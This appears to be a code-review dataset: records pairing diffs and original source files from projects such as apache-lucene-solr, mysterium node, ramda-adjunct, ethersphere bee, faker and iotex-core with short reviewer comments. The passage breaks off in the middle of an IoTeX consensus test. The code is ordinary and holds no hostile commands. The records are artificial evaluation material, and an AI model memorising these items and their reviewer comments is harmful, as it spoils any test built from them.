catch(AssertionFailedError e) { assertTrue("queries were not equal, as expected", true); } } public void testPayloadCheckQuery() throws Exception { try { assertQueryEquals ("payload_check" , "{!payload_check f=foo_dpf payloads=2}one" , "{!payload_check f=foo_dpf payloads=2}two" ); fail("queries should not have been equal"); } catch(AssertionFailedError e) { assertTrue("queries were not equal, as expected", true); } } public void testPayloadFunction() throws Exception { SolrQueryRequest req = req("myField","bar_f"); try { assertFuncEquals(req, "payload(foo_dpf,some_term)", "payload(foo_dpf,some_term)"); } finally { req.close(); } } public void testBoolQuery() throws Exception { assertQueryEquals("bool", "{!bool must='{!lucene}foo_s:a' must='{!lucene}foo_s:b'}", "{!bool must='{!lucene}foo_s:b' must='{!lucene}foo_s:a'}"); assertQueryEquals("bool", "{!bool must_not='{!lucene}foo_s:a' should='{!lucene}foo_s:b' " + "must='{!lucene}foo_s:c' filter='{!lucene}foo_s:d' filter='{!lucene}foo_s:e'}", "{!bool must='{!lucene}foo_s:c' filter='{!lucene}foo_s:d' " + "must_not='{!lucene}foo_s:a' should='{!lucene}foo_s:b' filter='{!lucene}foo_s:e'}"); try { assertQueryEquals ("bool" , "{!bool must='{!lucene}foo_s:a'}" , "{!bool should='{!lucene}foo_s:a'}" ); fail("queries should not have been equal"); } catch(AssertionFailedError e) { assertTrue("queries were not equal, as expected", true); } } // Override req to add df param public static SolrQueryRequest req(String... q) { return SolrTestCaseJ4.req(q, "df", "text"); } }
1
27,802
[0] Not suggesting you change it here, but....kindof weird that there's just not an `assertFuncNotEquals`
apache-lucene-solr
java
@@ -61,3 +61,19 @@ func (bc *Blockchain) GetAccountantFee(accountantAddress common.Address) (uint16 return res.Value, err } + +// IsRegistered checks wether the given identity is registered or not +func (bc *Blockchain) IsRegistered(registryAddress, addressToCheck common.Address) (bool, error) { + caller, err := bindings.NewRegistryCaller(registryAddress, bc.client) + if err != nil { + return false, errors.Wrap(err, "could not create registry caller") + } + + ctx, cancel := context.WithTimeout(context.Background(), bc.bcTimeout) + defer cancel() + + res, err := caller.IsRegistered(&bind.CallOpts{ + Context: ctx, + }, addressToCheck) + return res, errors.Wrap(err, "could not check registration status") +}
1
/* * Copyright (C) 2019 The "MysteriumNetwork/node" Authors. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package pingpong import ( "context" "time" "github.com/ethereum/go-ethereum/accounts/abi/bind" "github.com/ethereum/go-ethereum/common" "github.com/ethereum/go-ethereum/ethclient" "github.com/mysteriumnetwork/payments/bindings" "github.com/pkg/errors" ) // Blockchain contains all the useful blockchain utilities for the payment off chain messaging type Blockchain struct { client *ethclient.Client bcTimeout time.Duration } // NewBlockchain returns a new instance of blockchain func NewBlockchain(c *ethclient.Client, timeout time.Duration) *Blockchain { return &Blockchain{ client: c, bcTimeout: timeout, } } // GetAccountantFee fetches the accountant fee from blockchain func (bc *Blockchain) GetAccountantFee(accountantAddress common.Address) (uint16, error) { caller, err := bindings.NewAccountantImplementationCaller(accountantAddress, bc.client) if err != nil { return 0, errors.Wrap(err, "could not create accountant implementation caller") } ctx, cancel := context.WithTimeout(context.Background(), bc.bcTimeout) defer cancel() res, err := caller.LastFee(&bind.CallOpts{ Context: ctx, }) if err != nil { return 0, errors.Wrap(err, "could not get accountant fee") } return res.Value, err }
1
15,134
why are we passing 'registryAddress' here? We probably should construct it together with bc. Registry is not something that change?
mysteriumnetwork-node
go
@@ -2,7 +2,7 @@ import { pathOr, curry, merge } from 'ramda'; /** * Flattens a property path so that its fields are spread out into the provided object. - * + * It's like {@link RA.spreadPath|spreadPath}, but preserves object under property path * * @func flattenPath * @memberOf RA
1
import { pathOr, curry, merge } from 'ramda'; /** * Flattens a property path so that its fields are spread out into the provided object. * * * @func flattenPath * @memberOf RA * @since {@link https://char0n.github.io/ramda-adjunct/1.19.0|v1.19.0} * @category Object * @sig * [Idx] -> {k: v} -> {k: v} * Idx = String | Int * @param {!Array.<string|number>} path The property path to flatten * @param {!Object} obj The provided object * @return {!Object} The flattened object * @see {@link RA.flattenProp|flattenProp} * @example * * R.flattenPath( * ['b1', 'b2'], * { a: 1, b1: { b2: { c: 3, d: 4 } } } * ); // => { a: 1, c: 3, d: 4, b1: { b2: { c: 3, d: 4 } } }; */ const flattenPath = curry((path, obj) => merge(obj, pathOr({}, path, obj))); export default flattenPath;
1
4,930
`.` at the end of the sentence
char0n-ramda-adjunct
js
@@ -284,12 +284,16 @@ func (s *Service) checkAndAddPeers(ctx context.Context, peers pb.Peers) { ctx, cancel := context.WithTimeout(ctx, pingTimeout) defer cancel() + start := time.Now() + // check if the underlay is usable by doing a raw ping using libp2p if _, err = s.streamer.Ping(ctx, multiUnderlay); err != nil { + s.metrics.PingTime.Observe(float64(time.Since(start).Milliseconds())) s.metrics.UnreachablePeers.Inc() s.logger.Debugf("hive: peer %s: underlay %s not reachable", hex.EncodeToString(newPeer.Overlay), multiUnderlay) return } + s.metrics.PingTime.Observe(float64(time.Since(start).Milliseconds())) bzzAddress := bzz.Address{ Overlay: swarm.NewAddress(newPeer.Overlay),
1
// Copyright 2020 The Swarm Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // Package hive exposes the hive protocol implementation // which is the discovery protocol used to inform and be // informed about other peers in the network. It gossips // about all peers by default and performs no specific // prioritization about which peers are gossipped to // others. package hive import ( "context" "encoding/hex" "errors" "fmt" "sync" "time" "golang.org/x/sync/semaphore" "github.com/ethersphere/bee/pkg/addressbook" "github.com/ethersphere/bee/pkg/bzz" "github.com/ethersphere/bee/pkg/hive/pb" "github.com/ethersphere/bee/pkg/logging" "github.com/ethersphere/bee/pkg/p2p" "github.com/ethersphere/bee/pkg/p2p/protobuf" "github.com/ethersphere/bee/pkg/ratelimit" "github.com/ethersphere/bee/pkg/swarm" ma "github.com/multiformats/go-multiaddr" ) const ( protocolName = "hive" protocolVersion = "1.0.0" peersStreamName = "peers" messageTimeout = 1 * time.Minute // maximum allowed time for a message to be read or written. maxBatchSize = 30 pingTimeout = time.Second * 5 // time to wait for ping to succeed batchValidationTimeout = 5 * time.Minute // prevent lock contention on peer validation ) var ( limitBurst = 4 * int(swarm.MaxBins) limitRate = time.Minute ErrRateLimitExceeded = errors.New("rate limit exceeded") ) type Service struct { streamer p2p.StreamerPinger addressBook addressbook.GetPutter addPeersHandler func(...swarm.Address) networkID uint64 logger logging.Logger metrics metrics inLimiter *ratelimit.Limiter outLimiter *ratelimit.Limiter clearMtx sync.Mutex quit chan struct{} wg sync.WaitGroup peersChan chan pb.Peers sem *semaphore.Weighted } func New(streamer p2p.StreamerPinger, addressbook addressbook.GetPutter, networkID uint64, logger logging.Logger) *Service { svc := &Service{ streamer: streamer, logger: logger, addressBook: addressbook, networkID: networkID, metrics: newMetrics(), inLimiter: ratelimit.New(limitRate, limitBurst), outLimiter: ratelimit.New(limitRate, limitBurst), quit: make(chan struct{}), peersChan: make(chan pb.Peers), sem: semaphore.NewWeighted(int64(31)), } svc.startCheckPeersHandler() return svc } func (s *Service) Protocol() p2p.ProtocolSpec { return p2p.ProtocolSpec{ Name: protocolName, Version: protocolVersion, StreamSpecs: []p2p.StreamSpec{ { Name: peersStreamName, Handler: s.peersHandler, }, }, DisconnectIn: s.disconnect, DisconnectOut: s.disconnect, } } func (s *Service) BroadcastPeers(ctx context.Context, addressee swarm.Address, peers ...swarm.Address) error { max := maxBatchSize s.metrics.BroadcastPeers.Inc() s.metrics.BroadcastPeersPeers.Add(float64(len(peers))) for len(peers) > 0 { if max > len(peers) { max = len(peers) } // If broadcasting limit is exceeded, return early if !s.outLimiter.Allow(addressee.ByteString(), max) { return nil } if err := s.sendPeers(ctx, addressee, peers[:max]); err != nil { return err } peers = peers[max:] } return nil } func (s *Service) SetAddPeersHandler(h func(addr ...swarm.Address)) { s.addPeersHandler = h } func (s *Service) Close() error { close(s.quit) stopped := make(chan struct{}) go func() { defer close(stopped) s.wg.Wait() }() select { case <-stopped: return nil case <-time.After(time.Second * 5): return errors.New("hive: waited 5 seconds to close active goroutines") } } func (s *Service) sendPeers(ctx context.Context, peer swarm.Address, peers []swarm.Address) (err error) { s.metrics.BroadcastPeersSends.Inc() stream, err := s.streamer.NewStream(ctx, peer, nil, protocolName, protocolVersion, peersStreamName) if err != nil { return fmt.Errorf("new stream: %w", err) } defer func() { if err != nil { _ = stream.Reset() } else { // added this because Recorder (unit test) emits an unnecessary EOF when Close is called time.Sleep(time.Millisecond * 50) _ = stream.Close() } }() w, _ := protobuf.NewWriterAndReader(stream) var peersRequest pb.Peers for _, p := range peers { addr, err := s.addressBook.Get(p) if err != nil { if err == addressbook.ErrNotFound { s.logger.Debugf("hive broadcast peers: peer not found in the addressbook. Skipping peer %s", p) continue } return err } peersRequest.Peers = append(peersRequest.Peers, &pb.BzzAddress{ Overlay: addr.Overlay.Bytes(), Underlay: addr.Underlay.Bytes(), Signature: addr.Signature, Transaction: addr.Transaction, }) } if err := w.WriteMsgWithContext(ctx, &peersRequest); err != nil { return fmt.Errorf("write Peers message: %w", err) } return nil } func (s *Service) peersHandler(ctx context.Context, peer p2p.Peer, stream p2p.Stream) error { s.metrics.PeersHandler.Inc() _, r := protobuf.NewWriterAndReader(stream) ctx, cancel := context.WithTimeout(ctx, messageTimeout) defer cancel() var peersReq pb.Peers if err := r.ReadMsgWithContext(ctx, &peersReq); err != nil { _ = stream.Reset() return fmt.Errorf("read requestPeers message: %w", err) } s.metrics.PeersHandlerPeers.Add(float64(len(peersReq.Peers))) if !s.inLimiter.Allow(peer.Address.ByteString(), len(peersReq.Peers)) { _ = stream.Reset() return ErrRateLimitExceeded } // close the stream before processing in order to unblock the sending side // fullclose is called async because there is no need to wait for confirmation, // but we still want to handle not closed stream from the other side to avoid zombie stream go stream.FullClose() select { case s.peersChan <- peersReq: case <-s.quit: return errors.New("failed to process peers, shutting down hive") } return nil } func (s *Service) disconnect(peer p2p.Peer) error { s.clearMtx.Lock() defer s.clearMtx.Unlock() s.inLimiter.Clear(peer.Address.ByteString()) s.outLimiter.Clear(peer.Address.ByteString()) return nil } func (s *Service) startCheckPeersHandler() { ctx, cancel := context.WithCancel(context.Background()) s.wg.Add(1) go func() { defer s.wg.Done() <-s.quit cancel() }() s.wg.Add(1) go func() { defer s.wg.Done() for { select { case <-ctx.Done(): return case newPeers := <-s.peersChan: s.wg.Add(1) go func() { defer s.wg.Done() cctx, cancel := context.WithTimeout(ctx, batchValidationTimeout) defer cancel() s.checkAndAddPeers(cctx, newPeers) }() } } }() } func (s *Service) checkAndAddPeers(ctx context.Context, peers pb.Peers) { var peersToAdd []swarm.Address mtx := sync.Mutex{} wg := sync.WaitGroup{} for _, p := range peers.Peers { err := s.sem.Acquire(ctx, 1) if err != nil { return } wg.Add(1) go func(newPeer *pb.BzzAddress) { defer func() { s.sem.Release(1) wg.Done() }() multiUnderlay, err := ma.NewMultiaddrBytes(newPeer.Underlay) if err != nil { s.logger.Errorf("hive: multi address underlay err: %v", err) return } ctx, cancel := context.WithTimeout(ctx, pingTimeout) defer cancel() // check if the underlay is usable by doing a raw ping using libp2p if _, err = s.streamer.Ping(ctx, multiUnderlay); err != nil { s.metrics.UnreachablePeers.Inc() s.logger.Debugf("hive: peer %s: underlay %s not reachable", hex.EncodeToString(newPeer.Overlay), multiUnderlay) return } bzzAddress := bzz.Address{ Overlay: swarm.NewAddress(newPeer.Overlay), Underlay: multiUnderlay, Signature: newPeer.Signature, Transaction: newPeer.Transaction, } err = s.addressBook.Put(bzzAddress.Overlay, bzzAddress) if err != nil { s.logger.Warningf("skipping peer in response %s: %v", newPeer.String(), err) return } mtx.Lock() peersToAdd = append(peersToAdd, bzzAddress.Overlay) mtx.Unlock() }(p) } wg.Wait() if s.addPeersHandler != nil && len(peersToAdd) > 0 { s.addPeersHandler(peersToAdd...) } }
1
15,524
wouldn't it be useful to split this into an error metric for the timing?
ethersphere-bee
go
@@ -47,4 +47,8 @@ class TestFakerName < Test::Unit::TestCase assert @tester.initials.match(/[A-Z]{3}/) assert @tester.initials(2).match(/[A-Z]{2}/) end + + def test_fictional_character_name + assert @tester.fictional_character_name.match(/\w+/) + end end
1
# frozen_string_literal: true require_relative '../../test_helper' class TestFakerName < Test::Unit::TestCase def setup @tester = Faker::Name end def test_name assert @tester.name.match(/(\w+\.? ?){2,3}/) end def test_name_with_middle assert @tester.name_with_middle.match(/(\w+\.? ?){3,4}/) end def test_first_name assert @tester.first_name.match(/(\w+\.? ?){3,4}/) end def test_male_first_name assert @tester.male_first_name.is_a? String end def test_female_first_name assert @tester.female_first_name.is_a? String end def test_middle_name assert @tester.middle_name.match(/(\w+\.? ?){3,4}/) end def test_last_name assert @tester.last_name.match(/(\w+\.? ?){3,4}/) end def test_prefix assert @tester.prefix.match(/[A-Z][a-z]+\.?/) end def test_suffix assert @tester.suffix.match(/[A-Z][a-z]*\.?/) end def test_initials assert @tester.initials.match(/[A-Z]{3}/) assert @tester.initials(2).match(/[A-Z]{2}/) end end
1
9,121
Not sure if this is good enough. Each generator will have it's own unit test anyway. Ideally, I think I'd want to test that each generator in the yml is actually a valid generator...
faker-ruby-faker
rb
@@ -1293,6 +1293,8 @@ func newTestCFSM( MintNewSecretBlock(gomock.Any(), gomock.Any(), gomock.Any()).Return(secretBlkToMint, nil).AnyTimes() blockchain.EXPECT(). Nonce(gomock.Any()).Return(uint64(0), nil).AnyTimes() + blockchain.EXPECT(). + MintNewBlockWithActionIterator(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(blkToMint, nil).AnyTimes() if mockChain == nil { candidates := make([]*state.Candidate, 0) for _, delegate := range delegates {
1
// Copyright (c) 2018 IoTeX // This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no // warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent // permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache // License 2.0 that can be found in the LICENSE file. package rolldpos import ( "context" "math/big" "testing" "time" "github.com/facebookgo/clock" "github.com/golang/mock/gomock" "github.com/pkg/errors" "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" "github.com/iotexproject/iotex-core/action" "github.com/iotexproject/iotex-core/address" "github.com/iotexproject/iotex-core/blockchain" "github.com/iotexproject/iotex-core/config" "github.com/iotexproject/iotex-core/crypto" "github.com/iotexproject/iotex-core/endorsement" "github.com/iotexproject/iotex-core/iotxaddress" "github.com/iotexproject/iotex-core/logger" "github.com/iotexproject/iotex-core/pkg/hash" "github.com/iotexproject/iotex-core/pkg/keypair" "github.com/iotexproject/iotex-core/state" "github.com/iotexproject/iotex-core/test/mock/mock_actpool" "github.com/iotexproject/iotex-core/test/mock/mock_blockchain" "github.com/iotexproject/iotex-core/test/mock/mock_network" "github.com/iotexproject/iotex-core/test/testaddress" "github.com/iotexproject/iotex-core/testutil" ) var testAddrs = []*iotxaddress.Address{ newTestAddr(), newTestAddr(), newTestAddr(), newTestAddr(), newTestAddr(), } func TestBackdoorEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() ctx := makeTestRollDPoSCtx( testAddrs[0], ctrl, config.RollDPoS{ EventChanSize: 1, EnableDKG: true, }, func(mockBlockchain *mock_blockchain.MockBlockchain) { mockBlockchain.EXPECT().TipHeight().Return(uint64(0)).Times(8) }, func(_ *mock_actpool.MockActPool) {}, func(_ *mock_network.MockOverlay) {}, clock.New(), ) cfsm, err := newConsensusFSM(ctx) require.Nil(t, err) require.NotNil(t, cfsm) require.Equal(t, sEpochStart, cfsm.currentState()) cfsm.Start(context.Background()) defer cfsm.Stop(context.Background()) for _, state := range consensusStates { cfsm.produce(cfsm.newBackdoorEvt(state), 0) testutil.WaitUntil(10*time.Millisecond, 100*time.Millisecond, func() (bool, error) { return state == cfsm.currentState(), nil }) } } func TestRollDelegatesEvt(t *testing.T) { t.Parallel() t.Run("is-delegate", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } cfsm := newTestCFSM(t, testAddrs[0], testAddrs[2], ctrl, delegates, nil, nil, clock.New()) s, err := cfsm.handleRollDelegatesEvt(cfsm.newCEvt(eRollDelegates)) assert.Equal(t, sDKGGeneration, s) assert.NoError(t, err) assert.Equal(t, uint64(1), cfsm.ctx.epoch.height) assert.Equal(t, uint64(1), cfsm.ctx.epoch.num) assert.Equal(t, uint(2), cfsm.ctx.epoch.numSubEpochs) crypto.SortCandidates(delegates, cfsm.ctx.epoch.num, crypto.CryptoSeed) assert.Equal(t, delegates, cfsm.ctx.epoch.delegates) assert.Equal(t, eGenerateDKG, (<-cfsm.evtq).Type()) }) t.Run("is-not-delegate", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i+1].RawAddress } cfsm := newTestCFSM(t, testAddrs[0], testAddrs[2], ctrl, delegates, nil, nil, clock.New()) s, err := cfsm.handleRollDelegatesEvt(cfsm.newCEvt(eRollDelegates)) assert.Equal(t, sEpochStart, s) assert.NoError(t, err) // epoch ctx not set assert.Equal(t, uint64(0), cfsm.ctx.epoch.height) assert.Equal(t, eRollDelegates, (<-cfsm.evtq).Type()) }) t.Run("calcEpochNumAndHeight-error", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(mockBlockchain *mock_blockchain.MockBlockchain) { mockBlockchain.EXPECT().TipHeight().Return(uint64(0)).Times(2) mockBlockchain.EXPECT().CandidatesByHeight(gomock.Any()).Return(nil, nil).Times(1) }, nil, clock.New(), ) s, err := cfsm.handleRollDelegatesEvt(cfsm.newCEvt(eRollDelegates)) assert.Equal(t, sEpochStart, s) assert.Error(t, err) // epoch ctx not set assert.Equal(t, uint64(0), cfsm.ctx.epoch.height) assert.Equal(t, eRollDelegates, (<-cfsm.evtq).Type()) }) t.Run("rollingDelegates-error", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(mockBlockchain *mock_blockchain.MockBlockchain) { mockBlockchain.EXPECT().TipHeight().Return(uint64(1)).Times(2) mockBlockchain.EXPECT().CandidatesByHeight(gomock.Any()).Return(nil, nil).Times(1) }, nil, clock.New(), ) s, err := cfsm.handleRollDelegatesEvt(cfsm.newCEvt(eRollDelegates)) assert.Equal(t, sEpochStart, s) assert.Error(t, err) // epoch ctx not set assert.Equal(t, uint64(0), cfsm.ctx.epoch.height) assert.Equal(t, eRollDelegates, (<-cfsm.evtq).Type()) }) } func TestGenerateDKGEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 21) test21Addrs := test21Addrs() for i, addr := range test21Addrs { delegates[i] = addr.RawAddress } t.Run("no-delay", func(t *testing.T) { cfsm := newTestCFSM(t, test21Addrs[2], test21Addrs[2], ctrl, delegates, nil, nil, clock.New()) s, err := cfsm.handleGenerateDKGEvt(cfsm.newCEvt(eGenerateDKG)) assert.Equal(t, sRoundStart, s) assert.NoError(t, err) assert.Equal(t, eStartRound, (<-cfsm.evtq).Type()) }) t.Run("delay", func(t *testing.T) { cfsm := newTestCFSM(t, test21Addrs[2], test21Addrs[2], ctrl, delegates, nil, nil, clock.New()) cfsm.ctx.cfg.ProposerInterval = 2 * time.Second start := time.Now() s, err := cfsm.handleGenerateDKGEvt(cfsm.newCEvt(eGenerateDKG)) assert.Equal(t, sRoundStart, s) assert.NoError(t, err) assert.Equal(t, eStartRound, (<-cfsm.evtq).Type()) // Allow 1 second delay during the process assert.True(t, time.Since(start) > time.Second) }) } func TestStartRoundEvt(t *testing.T) { t.Parallel() t.Run("is-proposer", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } cfsm := newTestCFSM(t, testAddrs[2], testAddrs[2], ctrl, delegates, nil, nil, clock.New()) cfsm.ctx.epoch = epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(1), } require := require.New(t) s, err := cfsm.handleStartRoundEvt(cfsm.newCEvt(eStartRound)) require.NoError(err) require.Equal(sBlockPropose, s) require.Equal(uint64(0), cfsm.ctx.epoch.subEpochNum) require.NotNil(cfsm.ctx.round.proposer, delegates[2]) require.NotNil(cfsm.ctx.round.endorsementSets, s) e := <-cfsm.evtq require.Equal(eInitBlockPropose, e.Type()) e = <-cfsm.evtq require.Equal(eProposeBlockTimeout, e.Type()) e = <-cfsm.evtq require.Equal(eEndorseProposalTimeout, e.Type()) e = <-cfsm.evtq require.Equal(eEndorseLockTimeout, e.Type()) }) t.Run("is-not-proposer", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i+1].RawAddress } cfsm := newTestCFSM(t, testAddrs[1], testAddrs[2], ctrl, delegates, nil, nil, clock.New()) cfsm.ctx.epoch = epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(1), } require := require.New(t) s, err := cfsm.handleStartRoundEvt(cfsm.newCEvt(eStartRound)) require.NoError(err) require.Equal(sBlockPropose, s) require.Equal(uint64(0), cfsm.ctx.epoch.subEpochNum) require.NotNil(cfsm.ctx.round.proposer, delegates[2]) require.NotNil(cfsm.ctx.round.endorsementSets, s) evt := <-cfsm.evtq require.Equal(eInitBlockPropose, evt.Type()) s, err = cfsm.handleInitBlockProposeEvt(evt) require.Equal(sAcceptPropose, s) require.NoError(err) evt = <-cfsm.evtq require.Equal(eProposeBlockTimeout, evt.Type()) s, err = cfsm.handleProposeBlockTimeout(evt) require.Equal(sAcceptProposalEndorse, s) require.NoError(err) evt = <-cfsm.evtq require.Equal(eEndorseProposalTimeout, evt.Type()) s, err = cfsm.handleEndorseProposalTimeout(evt) require.NoError(err) require.Equal(sAcceptLockEndorse, s) evt = <-cfsm.evtq require.Equal(eEndorseLockTimeout, evt.Type()) s, err = cfsm.handleEndorseLockTimeout(evt) require.NoError(err) require.Equal(sRoundStart, s) }) } func TestHandleInitBlockEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 21) test21Addrs := test21Addrs() for i, addr := range test21Addrs { delegates[i] = addr.RawAddress } cfsm := newTestCFSM( t, test21Addrs[2], test21Addrs[2], ctrl, delegates, nil, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(2) }, clock.New(), ) cfsm.ctx.epoch.numSubEpochs = uint(2) cfsm.ctx.round = roundCtx{ endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } t.Run("secret-block", func(t *testing.T) { cfsm.ctx.epoch.subEpochNum = uint64(0) s, err := cfsm.handleInitBlockProposeEvt(cfsm.newCEvt(eInitBlockPropose)) require.NoError(t, err) require.Equal(t, sAcceptPropose, s) e := <-cfsm.evtq require.Equal(t, eProposeBlock, e.Type()) pbe, ok := e.(*proposeBlkEvt) require.True(t, ok) require.NotNil(t, pbe.block) require.Equal(t, len(delegates), len(pbe.block.SecretProposals)) require.NotNil(t, pbe.block.SecretWitness) }) t.Run("normal-block", func(t *testing.T) { cfsm.ctx.epoch.subEpochNum = uint64(1) s, err := cfsm.handleInitBlockProposeEvt(cfsm.newCEvt(eInitBlockPropose)) require.NoError(t, err) require.Equal(t, sAcceptPropose, s) e := <-cfsm.evtq require.Equal(t, eProposeBlock, e.Type()) pbe, ok := e.(*proposeBlkEvt) require.True(t, ok) require.NotNil(t, pbe.block) transfers, votes, _ := action.ClassifyActions(pbe.block.Actions) require.Equal(t, 1, len(transfers)) require.Equal(t, 1, len(votes)) }) } func TestHandleProposeBlockEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(1), } round := roundCtx{ height: 2, number: 0, endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } t.Run("pass-validation", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, nil, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(1) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) e := <-cfsm.evtq evt, ok := e.(*endorseEvt) require.True(t, ok) assert.Equal(t, eEndorseProposal, evt.Type()) }) t.Run("pass-validation-time-rotation", func(t *testing.T) { clock := clock.NewMock() cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, nil, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(2) }, clock, ) cfsm.ctx.cfg.TimeBasedRotation = true cfsm.ctx.cfg.ProposerInterval = 10 * time.Second cfsm.ctx.epoch = epoch cfsm.ctx.round = round clock.Add(11 * time.Second) blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) e := <-cfsm.evtq evt, ok := e.(*endorseEvt) require.True(t, ok) assert.Equal(t, eEndorseProposal, evt.Type()) clock.Add(10 * time.Second) state, err = cfsm.handleStartRoundEvt(cfsm.newCEvt(eStartRound)) assert.Equal(t, sBlockPropose, state) assert.NoError(t, err) e = <-cfsm.evtq cevt, ok := e.(*consensusEvt) require.True(t, ok) assert.Equal(t, eInitBlockPropose, cevt.Type()) blk.Header.Pubkey = testAddrs[3].PublicKey err = blk.SignBlock(testAddrs[3]) assert.NoError(t, err) state, err = cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) <-cfsm.evtq require.True(t, ok) assert.Equal(t, eEndorseProposal, evt.Type()) }) t.Run("fail-validation", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().ValidateBlock(gomock.Any(), gomock.Any()).Return(errors.New("mock error")).Times(1) }, nil, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptPropose, state) }) t.Run("skip-validation", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[2], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().ValidateBlock(gomock.Any(), gomock.Any()).Times(0) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(1) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) e := <-cfsm.evtq evt, ok := e.(*endorseEvt) require.True(t, ok) assert.Equal(t, eEndorseProposal, evt.Type()) }) t.Run("invalid-proposer", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[2], testAddrs[3], ctrl, delegates, nil, nil, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptPropose, state) state, err = cfsm.handleProposeBlockTimeout(cfsm.newCEvt(eProposeBlockTimeout)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) }) t.Run("invalid-proposer-time-rotation", func(t *testing.T) { clock := clock.NewMock() cfsm := newTestCFSM( t, testAddrs[2], testAddrs[3], ctrl, delegates, nil, nil, clock, ) cfsm.ctx.cfg.TimeBasedRotation = true cfsm.ctx.cfg.ProposerInterval = 10 * time.Second cfsm.ctx.epoch = epoch cfsm.ctx.round = round clock.Add(11 * time.Second) blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) state, err := 